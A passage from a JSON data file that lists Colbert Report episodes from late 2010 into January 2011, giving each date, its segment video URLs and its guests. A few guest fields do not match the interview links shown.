        "http://thecolbertreport.cc.com/videos/uj8r4c/march-to-keep-fear-alive-announcement",
        "http://thecolbertreport.cc.com/videos/5klha6/threatdown---bedbugs---environmentalists---jerome-goddard",
        "http://thecolbertreport.cc.com/videos/pck634/lawrence-o-donnell",
        "http://thecolbertreport.cc.com/videos/h5yz8n/sign-off---march-to-keep-fear-alive"
      ],
      "guest": "Lawrence O'Donnell"
    },
    {
      "date": "2010-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cahpkw/intro---9-20-10",
        "http://thecolbertreport.cc.com/videos/1fmwjo/christine-o-donnell-witch-test",
        "http://thecolbertreport.cc.com/videos/diatjd/tip-wag---chilean-miners--portland-press-herald---isa-blyth",
        "http://thecolbertreport.cc.com/videos/a4y4ey/march-to-keep-fear-alive-media-coverage",
        "http://thecolbertreport.cc.com/videos/b65ofd/pavement"
      ],
      "guest": "Pavement"
    },
    {
      "date": "2010-09-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yi7cbo/intro---9-21-10",
        "http://thecolbertreport.cc.com/videos/t99up5/in-poor-taste---mark-shriver",
        "http://thecolbertreport.cc.com/videos/2vrsvg/colbertslist",
        "http://thecolbertreport.cc.com/videos/tnb3an/eric-schmidt",
        "http://thecolbertreport.cc.com/videos/kecowj/sign-off---sign-up-for-the-march-to-keep-fear-alive"
      ],
      "guest": "Eric Schmidt"
    },
    {
      "date": "2010-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q8xj8c/intro---9-22-10",
        "http://thecolbertreport.cc.com/videos/gcap67/the-christine-o-donnell-clip-predictor-3000",
        "http://thecolbertreport.cc.com/videos/xq0472/the-word---the-more-you-no",
        "http://thecolbertreport.cc.com/videos/xr7q4y/fallback-position---migrant-worker-pt--1",
        "http://thecolbertreport.cc.com/videos/kgnwdf/guillermo-del-toro",
        "http://thecolbertreport.cc.com/videos/lnpblj/sign-off---stephen-won-t-forgive-you"
      ],
      "guest": "Guillermo Del Toro"
    },
    {
      "date": "2010-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e9ulyf/intro---9-23-10",
        "http://thecolbertreport.cc.com/videos/puxqvp/fallback-position---migrant-worker-pt--2",
        "http://thecolbertreport.cc.com/videos/imp10g/sanchez-bump",
        "http://thecolbertreport.cc.com/videos/937jzh/oscar-goodman",
        "http://thecolbertreport.cc.com/videos/hitep1/sign-off---american-history-lesson"
      ],
      "guest": "Oscar Goodman"
    },
    {
      "date": "2010-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/esvw5v/intro---9-27-10",
        "http://thecolbertreport.cc.com/videos/aychpz/corn-packer-apology",
        "http://thecolbertreport.cc.com/videos/nc19il/the-delawert-report",
        "http://thecolbertreport.cc.com/videos/pcae92/the-word---army-of-mum",
        "http://thecolbertreport.cc.com/videos/kby55r/yahweh-or-no-way---ihop---antonio-federici-ad",
        "http://thecolbertreport.cc.com/videos/y2afey/ken-burns",
        "http://thecolbertreport.cc.com/videos/g2pys1/sign-off---goodnight"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2010-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s437p7/intro---9-28-10",
        "http://thecolbertreport.cc.com/videos/gspyir/left-behind---paul-begala",
        "http://thecolbertreport.cc.com/videos/57ib6e/terror-a-new-one",
        "http://thecolbertreport.cc.com/videos/ut4vp1/ross-douthat",
        "http://thecolbertreport.cc.com/videos/0pm7c2/sign-off---democratic-grave"
      ],
      "guest": "Paul Begala, Ross Douthat"
    },
    {
      "date": "2010-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/umvy3w/march-to-keep-fear-alive-insanity-bus",
        "http://thecolbertreport.cc.com/videos/kup6co/the-word---original-spin",
        "http://thecolbertreport.cc.com/videos/z1c69t/threatdown---record-breaking-gays--koalas---purell",
        "http://thecolbertreport.cc.com/videos/q56zhc/steven-rattner",
        "http://thecolbertreport.cc.com/videos/kn5pkq/sign-off---sign-up-for-the-march-to-keep-fear-alive"
      ],
      "guest": "Steve Rattner"
    },
    {
      "date": "2010-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/umgd4n/intro---9-30-10",
        "http://thecolbertreport.cc.com/videos/xic7q8/president-obama-endorses-the-rally-to-restore-sanity",
        "http://thecolbertreport.cc.com/videos/xd5pkh/droid-rage",
        "http://thecolbertreport.cc.com/videos/w8i263/stat-of-the-union",
        "http://thecolbertreport.cc.com/videos/h7gmgz/aaron-sorkin",
        "http://thecolbertreport.cc.com/videos/7zrc6h/sign-off---march-to-keep-fear-alive-costumes"
      ],
      "guest": "Aaron Sorkin"
    },
    {
      "date": "2010-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vwiap8/intro---10-4-10",
        "http://thecolbertreport.cc.com/videos/h7fctl/we-world-war-won-it",
        "http://thecolbertreport.cc.com/videos/k8t4ao/the-word---it-s-a-small-minded-world",
        "http://thecolbertreport.cc.com/videos/nbdcz5/tip-wag---tea-party-coloring-book---calm-legislation",
        "http://thecolbertreport.cc.com/videos/pl2b2g/eugene-robinson",
        "http://thecolbertreport.cc.com/videos/3w0ogs/sign-off---matching-donor"
      ],
      "guest": "Eugene Robinson"
    },
    {
      "date": "2010-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/72j4yn/intro---10-5-10",
        "http://thecolbertreport.cc.com/videos/9xty22/american-sexual-habits",
        "http://thecolbertreport.cc.com/videos/0xyglo/gang-busters---john-burnett",
        "http://thecolbertreport.cc.com/videos/e4gleb/langur-monkey-security",
        "http://thecolbertreport.cc.com/videos/98qo87/leon-botstein",
        "http://thecolbertreport.cc.com/videos/gi2fk6/sign-off---goodnight"
      ],
      "guest": "Leon Botstein"
    },
    {
      "date": "2010-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg4r1d/intro---10-6-10",
        "http://thecolbertreport.cc.com/videos/gu3bg9/tiny-triumphs---environmentalist-ear-pollution",
        "http://thecolbertreport.cc.com/videos/rex0nc/rawesome-foods-raid",
        "http://thecolbertreport.cc.com/videos/6krvaq/mavis-staples---jeff-tweedy",
        "http://thecolbertreport.cc.com/videos/01gaiu/sign-off---you-are-not-alone"
      ],
      "guest": "Mavis Staples & Jeff Tweedy"
    },
    {
      "date": "2010-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sy1j26/indecision-2010---revenge-of-the-fallen---fearstock-com",
        "http://thecolbertreport.cc.com/videos/5qjigz/proposition-19---joseph-califano---gary-johnson",
        "http://thecolbertreport.cc.com/videos/rzuziw/donorschoose-org-fear-drawings",
        "http://thecolbertreport.cc.com/videos/077dy4/davis-guggenheim",
        "http://thecolbertreport.cc.com/videos/th4oe4/sign-off---don-t-go-to-donorschoose-com"
      ],
      "guest": "Davis Guggenheim"
    },
    {
      "date": "2010-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mnxgqn/intro---10-11-10",
        "http://thecolbertreport.cc.com/videos/2buyr8/rich-iott-wears-a-nazi-uniform",
        "http://thecolbertreport.cc.com/videos/f1n1ah/threatdown---muslim-edition",
        "http://thecolbertreport.cc.com/videos/6x3w7h/formula-4-your-eyes-only",
        "http://thecolbertreport.cc.com/videos/l23gil/robert-reich",
        "http://thecolbertreport.cc.com/videos/6314hj/sign-off---stephen-needs-a-place-to-hold-his-march"
      ],
      "guest": "Robert Reich"
    },
    {
      "date": "2010-10-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ksbkyk/intro---10-12-10",
        "http://thecolbertreport.cc.com/videos/que3dz/101-year-old-woman-becomes-a-u-s--citizen",
        "http://thecolbertreport.cc.com/videos/xpawsw/tip-wag---peabody-public-schools--andy-rooney---ground-zero-mosque-design",
        "http://thecolbertreport.cc.com/videos/o656bc/merch-to-keep-fear-alive",
        "http://thecolbertreport.cc.com/videos/bncunr/brendan-steinhauser",
        "http://thecolbertreport.cc.com/videos/4i1iy2/sign-off---apple-filled-with-razor-blades"
      ],
      "guest": "Brendan Steinhauser"
    },
    {
      "date": "2010-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nkf1gw/intro---10-13-10",
        "http://thecolbertreport.cc.com/videos/40azz5/america-helps-rescue-chilean-miners",
        "http://thecolbertreport.cc.com/videos/fg5dcw/sport-report---steroids--commonwealth-games---brett-favre-s-sexting",
        "http://thecolbertreport.cc.com/videos/nq3g54/tax-shelter-skelter",
        "http://thecolbertreport.cc.com/videos/ip94pd/austan-goolsbee",
        "http://thecolbertreport.cc.com/videos/7n0fzv/sign-off---tic-tac-toe-with-austan-goolsbee"
      ],
      "guest": "Austan Goolsbee"
    },
    {
      "date": "2010-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ke3ug4/transitive-property-of-christine-o-donnell",
        "http://thecolbertreport.cc.com/videos/jvi6id/people-who-are-destroying-america---landscaping-goats",
        "http://thecolbertreport.cc.com/videos/8kgt7i/rally-to-restore-sanity-and-or-fear-chinatown-bus-tickets",
        "http://thecolbertreport.cc.com/videos/wc2nwv/bill-bryson",
        "http://thecolbertreport.cc.com/videos/ns0u0b/sign-off---oprah-is-wonderful"
      ],
      "guest": "Bill Bryson"
    },
    {
      "date": "2010-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ou6z90/indecision-2010---revenge-of-the-fallen---sean-bielat---ken-buck",
        "http://thecolbertreport.cc.com/videos/t96zw6/the-word---midterm-erection",
        "http://thecolbertreport.cc.com/videos/r3cpem/who-s-honoring-me-now----colbert-nation-five-years-of-excellence-award",
        "http://thecolbertreport.cc.com/videos/tx8w6w/nicholas-negroponte",
        "http://thecolbertreport.cc.com/videos/hjbcjo/sign-off---fifth-anniversary-portrait"
      ],
      "guest": "Nicholas Negroponte"
    },
    {
      "date": "2010-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vtn4dg/intro---10-26-10",
        "http://thecolbertreport.cc.com/videos/upm6ow/stephen-appears-in-the-new-york-times-crossword-puzzle",
        "http://thecolbertreport.cc.com/videos/rh943m/the-word---invisible-inc-",
        "http://thecolbertreport.cc.com/videos/57deny/food-insurance-insurance",
        "http://thecolbertreport.cc.com/videos/9dol4n/garry-wills",
        "http://thecolbertreport.cc.com/videos/ifnetg/sign-off---stream-elvis-costello-s-national-ransom"
      ],
      "guest": "Garry Wills"
    },
    {
      "date": "2010-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qjfe6u/exclusive---have-you-seen-the-ghost-of-jon-",
        "http://thecolbertreport.cc.com/videos/iyha0d/intro---10-27-10",
        "http://thecolbertreport.cc.com/videos/a393lf/rand-paul-supporter-stomps-on-liberal-activist-s-head",
        "http://thecolbertreport.cc.com/videos/ah47vl/indecision-2010---revenge-of-the-fallen---tom-perriello",
        "http://thecolbertreport.cc.com/videos/k3z37d/snooki-halloween-costume---spooky-rally-song",
        "http://thecolbertreport.cc.com/videos/tmruw9/apolo-ohno",
        "http://thecolbertreport.cc.com/videos/g0i5r2/sign-off---2010-election-map-from-denny-s"
      ],
      "guest": "Rep. Tom Perriello, Apolo Anton Ohno"
    },
    {
      "date": "2010-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ea746g/the-mcrib-is-back",
        "http://thecolbertreport.cc.com/videos/y2nj3n/fear-for-all-pt--1",
        "http://thecolbertreport.cc.com/videos/ttx9jf/fear-for-all-pt--2",
        "http://thecolbertreport.cc.com/videos/el1mv0/maira-kalman",
        "http://thecolbertreport.cc.com/videos/p6c0ah/sign-off---see-you-at-the-rally"
      ],
      "guest": "Maira Kalman"
    },
    {
      "date": "2010-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4or1uk/intro---11-1-10",
        "http://thecolbertreport.cc.com/videos/pjth2k/a-fond-look-back-at-the-rally",
        "http://thecolbertreport.cc.com/videos/6y87u2/midterm-senate-races---nevada--alaska---delaware",
        "http://thecolbertreport.cc.com/videos/ghbjcp/hispanic-and-gay-voters-should-stay-at-home",
        "http://thecolbertreport.cc.com/videos/r4udbe/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/h06l8n/sign-off---don-t-forget-to-vote"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2010-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q6wjad/indecision-2010---intro---11-2-10",
        "http://thecolbertreport.cc.com/videos/5y5ul8/indecision-2010---gop-takes-house",
        "http://thecolbertreport.cc.com/videos/yubkdk/indecision-2010---david-frum",
        "http://thecolbertreport.cc.com/videos/ii11zs/indecision-2010---katrina-vanden-heuvel",
        "http://thecolbertreport.cc.com/videos/fpxe9g/indecision-2010---sign-off---election-to-end-all-elections"
      ],
      "guest": "Katrina vanden Heuvel, David Frum"
    },
    {
      "date": "2010-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/npkdbl/intro---11-3-10",
        "http://thecolbertreport.cc.com/videos/dnol9b/we-hardly-better-knew-ye",
        "http://thecolbertreport.cc.com/videos/tsa7r8/stephen-colbert-gives-you-props",
        "http://thecolbertreport.cc.com/videos/g1n60y/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/0ciqy7/sign-off---smiley-face-balloon"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2010-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ze4pgk/intro---11-4-10",
        "http://thecolbertreport.cc.com/videos/jssup2/spider-man-is-alaska-s-write-in-candidate",
        "http://thecolbertreport.cc.com/videos/59l5bf/tip-wag---tsa--bert---dogs",
        "http://thecolbertreport.cc.com/videos/px319n/elvis-costello"
      ],
      "guest": "Elvis Costello"
    },
    {
      "date": "2010-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bf24qu/one-hour-in-the-future",
        "http://thecolbertreport.cc.com/videos/odml1w/the-word---nothingness",
        "http://thecolbertreport.cc.com/videos/450kbl/president-obama-s-expensive-trip-to-india",
        "http://thecolbertreport.cc.com/videos/itfuo6/reza-aslan",
        "http://thecolbertreport.cc.com/videos/flh0gj/sign-off---battleship"
      ],
      "guest": "Reza Aslan"
    },
    {
      "date": "2010-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ndicnt/decision-points",
        "http://thecolbertreport.cc.com/videos/t6dluv/house-oversight-committee-hearings---abbe-lowell",
        "http://thecolbertreport.cc.com/videos/2tsnui/craziest-f--king-thing-i-ve-ever-heard---crab-vending-machines",
        "http://thecolbertreport.cc.com/videos/thu56b/cee-lo-green"
      ],
      "guest": "Cee-Lo Green"
    },
    {
      "date": "2010-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r8nn6k/michelle-obama-s-embarrassing-handshake",
        "http://thecolbertreport.cc.com/videos/h0bv7g/america-s-job-loss---beri-fox",
        "http://thecolbertreport.cc.com/videos/qra7vl/statue-of-jesus",
        "http://thecolbertreport.cc.com/videos/0cxark/martha-stewart",
        "http://thecolbertreport.cc.com/videos/gd9t0s/sign-off---saltine-hors-d-oeuvres"
      ],
      "guest": "Martha Stewart"
    },
    {
      "date": "2010-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vavqn0/colbert-platinum---kanye-west---million-dollar-advent-calendar-segment",
        "http://thecolbertreport.cc.com/videos/6py8bn/intro---11-11-10",
        "http://thecolbertreport.cc.com/videos/6obewf/stephen-absorbs-gene-shalit-s-opinions",
        "http://thecolbertreport.cc.com/videos/pigos8/colbert-platinum---kanye-west---million-dollar-advent-calendar",
        "http://thecolbertreport.cc.com/videos/8zchd5/stephen-trademarks-dated-catchphrases",
        "http://thecolbertreport.cc.com/videos/opi39p/quincy-jones",
        "http://thecolbertreport.cc.com/videos/dlv5sb/sign-off---if-it-walks-like-a-duck"
      ],
      "guest": "Quincy Jones"
    },
    {
      "date": "2010-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zwpnzb/finding-mr--goodwrench",
        "http://thecolbertreport.cc.com/videos/dzeed3/tsa-full-body-scanners---jeffrey-goldberg",
        "http://thecolbertreport.cc.com/videos/yi115x/garfield-and-president-obama-s-veterans-day-controversies",
        "http://thecolbertreport.cc.com/videos/zgerlg/david-stern",
        "http://thecolbertreport.cc.com/videos/f5nt0v/sign-off---garfield-loves-veterans"
      ],
      "guest": "David Stern"
    },
    {
      "date": "2010-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6jx8i/intro---11-16-10",
        "http://thecolbertreport.cc.com/videos/r1nlt4/prince-william-proposes-to-kate-middleton",
        "http://thecolbertreport.cc.com/videos/6x0tmp/thought-for-food---c-zurrrre--medal-of-hunger-winner---cheesercize",
        "http://thecolbertreport.cc.com/videos/5n8eoi/stephen-colbert-s-report",
        "http://thecolbertreport.cc.com/videos/brwtip/john-legend"
      ],
      "guest": "John Legend"
    },
    {
      "date": "2010-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/13lnab/intro---11-17-10",
        "http://thecolbertreport.cc.com/videos/bzhpi2/charlie-rangel--you-got-mailed",
        "http://thecolbertreport.cc.com/videos/izlih7/old-people-in-space",
        "http://thecolbertreport.cc.com/videos/rhup4k/chair-apparent",
        "http://thecolbertreport.cc.com/videos/x10udl/ian-frazier",
        "http://thecolbertreport.cc.com/videos/iu8jdu/synchronize-watches-to-colbert-time"
      ],
      "guest": "Ian Frazier"
    },
    {
      "date": "2010-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rip59b/stephen-pardons-joseph-gobbles",
        "http://thecolbertreport.cc.com/videos/6dqu0c/tip-wag---pope-benedict-xvi--trick-play---joseph-gobbles",
        "http://thecolbertreport.cc.com/videos/fbks4j/joseph-gobbles-shoots-jay-the-intern",
        "http://thecolbertreport.cc.com/videos/9ldbp0/salvatore-giunta",
        "http://thecolbertreport.cc.com/videos/92wwov/sign-off---happy-thanksgiving"
      ],
      "guest": "Staff Sgt. Salvatore Giunta"
    },
    {
      "date": "2010-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fyh8jk/intro---11-29-10",
        "http://thecolbertreport.cc.com/videos/5liwl3/black-friday-interpretation",
        "http://thecolbertreport.cc.com/videos/qhebrf/better-business-hero",
        "http://thecolbertreport.cc.com/videos/1fhpey/dan-savage",
        "http://thecolbertreport.cc.com/videos/nilxac/sign-off---goodnight"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2010-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0th7i0/god-drops-steve-johnson-s-football-pass",
        "http://thecolbertreport.cc.com/videos/rd3bzl/wikileaks-document-dump---james-rubin",
        "http://thecolbertreport.cc.com/videos/t2kayc/soap-opera-product-placement",
        "http://thecolbertreport.cc.com/videos/5qjkay/tom-vilsack",
        "http://thecolbertreport.cc.com/videos/ovt98b/sign-off---chex-mix-product-placement"
      ],
      "guest": "Tom Vilsack"
    },
    {
      "date": "2010-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/373wri/return-of-the-estate-tax",
        "http://thecolbertreport.cc.com/videos/hml13u/lame-duck-congress---jake-tapper",
        "http://thecolbertreport.cc.com/videos/df8z4y/cheating-death---calming-meat-goggles---the-ithrone",
        "http://thecolbertreport.cc.com/videos/hbifbv/michelle-rhee",
        "http://thecolbertreport.cc.com/videos/5oq9dq/sign-off---up-on-the-lingo"
      ],
      "guest": "Michelle Rhee"
    },
    {
      "date": "2010-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d067b7/intro---12-2-10",
        "http://thecolbertreport.cc.com/videos/y4fa8v/john-thune-looks-presidential",
        "http://thecolbertreport.cc.com/videos/vaqkqk/the-word---the-great-white-wail",
        "http://thecolbertreport.cc.com/videos/efh5u1/the-blitzkrieg-on-grinchitude---atheist-billboard---capitol-christmas-tree",
        "http://thecolbertreport.cc.com/videos/trmu6j/david-stockman",
        "http://thecolbertreport.cc.com/videos/v9n94y/sign-off---chinese-finger-trap"
      ],
      "guest": "David Stockman"
    },
    {
      "date": "2010-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/exzvsm/cosmo-is-available-in-mongolia",
        "http://thecolbertreport.cc.com/videos/bwubcy/the-word---unrequited-gov",
        "http://thecolbertreport.cc.com/videos/eoidl7/mysteries-of-the-ancient-unknown---the-pursuit-of-the-pharaoh-s-phallus-pt--1",
        "http://thecolbertreport.cc.com/videos/wdodc8/garry-trudeau",
        "http://thecolbertreport.cc.com/videos/gktluk/sign-off---goodnight"
      ],
      "guest": "Garry Trudeau"
    },
    {
      "date": "2010-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ishllr/extension-of-the-bush-tax-cuts",
        "http://thecolbertreport.cc.com/videos/n0u86v/mysteries-of-the-ancient-unknown---the-pursuit-of-the-pharaoh-s-phallus-pt--2",
        "http://thecolbertreport.cc.com/videos/ya6qw9/poll-to-repeal-don-t-ask--don-t-tell",
        "http://thecolbertreport.cc.com/videos/gf8r28/david-eisenhower---julie-nixon-eisenhower",
        "http://thecolbertreport.cc.com/videos/99syt9/sign-off---goodnight"
      ],
      "guest": "Julie Nixon Eisenhower & David Eisenhower"
    },
    {
      "date": "2010-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f6likw/exclusive---steve-martin-extended-segment",
        "http://thecolbertreport.cc.com/videos/kml8x8/tip-wag---art-edition---brent-glass",
        "http://thecolbertreport.cc.com/videos/2akwcg/steve-martin-pt--1",
        "http://thecolbertreport.cc.com/videos/yqcbtk/steve-martin-pt--2",
        "http://thecolbertreport.cc.com/videos/ct0ud7/sign-off---steve-martin-mask"
      ],
      "guest": "Steve Martin"
    },
    {
      "date": "2010-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/znivka/israel-shark-conspiracy",
        "http://thecolbertreport.cc.com/videos/fi19uy/international-manhunt-for-julian-assange---daniel-ellsberg",
        "http://thecolbertreport.cc.com/videos/fk2pnu/art-stephen-up-challenge---william-wegman",
        "http://thecolbertreport.cc.com/videos/1akto9/julie-taymor",
        "http://thecolbertreport.cc.com/videos/hcd55s/sign-off---christmas-party"
      ],
      "guest": "Julie Taymor"
    },
    {
      "date": "2010-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f2kl6o/intro---12-13-10",
        "http://thecolbertreport.cc.com/videos/eolk50/found-goldman-sachs-mastercard",
        "http://thecolbertreport.cc.com/videos/c1yv8b/the-word---swift-payment",
        "http://thecolbertreport.cc.com/videos/btsd4o/blitzkrieg-on-grinchitude---gretchen-carlson---christian-nation-christ-mas-tree",
        "http://thecolbertreport.cc.com/videos/rufuhr/patti-smith",
        "http://thecolbertreport.cc.com/videos/t0590z/sign-off---remembering-richard-holbrooke"
      ],
      "guest": "Patti Smith"
    },
    {
      "date": "2010-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ycermm/goldman-sachs-lawyers-want-buckley-t--ratchford-s-card-back",
        "http://thecolbertreport.cc.com/videos/rsdutw/prop-8-challenge---david-boies",
        "http://thecolbertreport.cc.com/videos/4tx5ks/stephen-wins-twitter---biz-stone",
        "http://thecolbertreport.cc.com/videos/ouqrnm/stephen-sondheim",
        "http://thecolbertreport.cc.com/videos/ajg2h0/sign-off---closing-credits"
      ],
      "guest": "David Boies, Stephen Sondheim"
    },
    {
      "date": "2010-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9gi4ae/intro---12-15-10",
        "http://thecolbertreport.cc.com/videos/67nfxh/scanner-defying-pancakes",
        "http://thecolbertreport.cc.com/videos/fv3gl9/world-war-3-0---omar-wasow",
        "http://thecolbertreport.cc.com/videos/rr8wvk/tiny-triumphs---lethal-drug-shortage",
        "http://thecolbertreport.cc.com/videos/e05lny/laird-hamilton",
        "http://thecolbertreport.cc.com/videos/nv267b/sign-off---winter-fashion-tip"
      ],
      "guest": "Omar Wasow, Laird Hamilton"
    },
    {
      "date": "2010-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cb861t/christmas-holy-week",
        "http://thecolbertreport.cc.com/videos/m38gcf/jesus-is-a-liberal-democrat",
        "http://thecolbertreport.cc.com/videos/tvxon5/amy-sedaris",
        "http://thecolbertreport.cc.com/videos/zejxdk/paul-simon"
      ],
      "guest": "Amy Sedaris, Paul Simon"
    }
  ],
  "2011": [
    {
      "date": "2011-01-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a5rzlq/intro---1-3-11",
        "http://thecolbertreport.cc.com/videos/pgayak/snowpocalypse-2010",
        "http://thecolbertreport.cc.com/videos/7b084t/tip-wag---susan-g--komen-foundation---spider-man-musical",
        "http://thecolbertreport.cc.com/videos/44ybv8/the-enemy-within---caboodle-ranch",
        "http://thecolbertreport.cc.com/videos/vopb2f/ed-rendell",
        "http://thecolbertreport.cc.com/videos/bvg4tu/sign-off---home-improvement-tip"
      ],
      "guest": "Sen. Bernie Sanders"
    },
    {
      "date": "2011-01-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/40y983/intro---1-4-11",
        "http://thecolbertreport.cc.com/videos/tq4xo3/native-american-overlords",
        "http://thecolbertreport.cc.com/videos/kafccc/gold-faithful",
        "http://thecolbertreport.cc.com/videos/0ds0c9/gold-faithful---ron-paul---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/leatvt/geoffrey-canada",
        "http://thecolbertreport.cc.com/videos/h983ts/sign-off---12-dutchmen-answer"
      ],
      "guest": "John Heilemann"
    },
    {
      "date": "2011-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/upvgg0/intro---1-5-11",
        "http://thecolbertreport.cc.com/videos/ttqn4k/huckleberry-finn-censorship",
        "http://thecolbertreport.cc.com/videos/4c01zx/what-s-a-reince-priebus-",
        "http://thecolbertreport.cc.com/videos/d2586v/yellowline-international--inc-",
        "http://thecolbertreport.cc.com/videos/1yfs5a/atul-gawande",
        "http://thecolbertreport.cc.com/videos/ta25ww/sign-off---dark-side-of-the-moon"
      ],
      "guest": "Steve Case"
    },
    {
      "date": "2011-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gfffz6/shout-out-to-arby-s",
        "http://thecolbertreport.cc.com/videos/g7dtso/john-boehner-s-large-gavel",
        "http://thecolbertreport.cc.com/videos/t27er5/cheating-death---placebo-effect--immortality---wild-lynx",
        "http://thecolbertreport.cc.com/videos/n6wqjn/bill-o-reilly-proves-god-s-existence---neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/i48v1q/ronald-depinho",
        "http://thecolbertreport.cc.com/videos/x8bqqt/sign-off---boris-the-lynx"
      ],
      "guest": "Dr. Ronald DePinho"
    },
    {
      "date": "2011-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qi5a0o/intro---1-10-11",
        "http://thecolbertreport.cc.com/videos/xl3r2n/pundits-lay-blame-for-senseless-arizona-attack",
        "http://thecolbertreport.cc.com/videos/6s01yh/bull-sessions",
        "http://thecolbertreport.cc.com/videos/cng4n9/difference-makers---galactic-edition-pt--1",
        "http://thecolbertreport.cc.com/videos/oelxfx/difference-makers---galactic-edition-pt--2",
        "http://thecolbertreport.cc.com/videos/gk32r8/fen-montaigne",
        "http://thecolbertreport.cc.com/videos/oslcyl/sign-off---goodnight"
      ],
      "guest": "Fen Montaigne"
    },
    {
      "date": "2011-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/97pzie/intro---1-11-11",
        "http://thecolbertreport.cc.com/videos/q63emf/snowstorm-preparation",
        "http://thecolbertreport.cc.com/videos/rbg8gh/metunes---grammy-vote---dan-auerbach--patrick-carney---ezra-koenig",
        "http://thecolbertreport.cc.com/videos/oqami3/lithuania-perfume",
        "http://thecolbertreport.cc.com/videos/mqh8rb/chris-hughes",
        "http://thecolbertreport.cc.com/videos/8re8oa/sign-off---pringles"
      ],
      "guest": "Chris Hughes"
    },
    {
      "date": "2011-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1aza8n/50-cent-makes-money-on-twitter",
        "http://thecolbertreport.cc.com/videos/b4mxvn/the-word---life--liberty-and-the-pursuit-of-angriness",
        "http://thecolbertreport.cc.com/videos/56kjjw/bernard-henri-levy-pt--1",
        "http://thecolbertreport.cc.com/videos/cmxyxs/bernard-henri-levy-pt--2",
        "http://thecolbertreport.cc.com/videos/splrfl/sign-off---goodnight"
      ],
      "guest": "Bernard-Henri Levy"
    },
    {
      "date": "2011-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5qwzv/hitler-s-inspiring-tucson-memorial-speech",
        "http://thecolbertreport.cc.com/videos/nhx7bu/thought-for-food---fruit-pouch--doritos-ad---super-big-gulp",
        "http://thecolbertreport.cc.com/videos/wdqdqn/israeli-vulture-spy",
        "http://thecolbertreport.cc.com/videos/xczq8w/kevin-spacey",
        "http://thecolbertreport.cc.com/videos/iyyhr8/sign-off---new-york-post"
      ],
      "guest": "Kevin Spacey"
    },
    {
      "date": "2011-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iuhos5/intro---1-17-11",
        "http://thecolbertreport.cc.com/videos/ztaz7m/martin-luther-king-jr--day-sales",
        "http://thecolbertreport.cc.com/videos/9ycstf/the-word---run-for-your-life",
        "http://thecolbertreport.cc.com/videos/ib4cpu/art-stephen-up-challenge---wade-hampton",
        "http://thecolbertreport.cc.com/videos/kd5rmr/sherry-turkle",
        "http://thecolbertreport.cc.com/videos/tj76rr/sign-off---new-york-post"
      ],
      "guest": "Sherry Turkle"
    },
    {
      "date": "2011-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fi5nk7/intro---1-18-11",
        "http://thecolbertreport.cc.com/videos/y6lk8z/mika-brzezinski-experiences-palin-fatigue",
        "http://thecolbertreport.cc.com/videos/1zj4bl/the-word---disintegration",
        "http://thecolbertreport.cc.com/videos/l4vdiw/coma-cozy",
        "http://thecolbertreport.cc.com/videos/zeukt7/cornel-west",
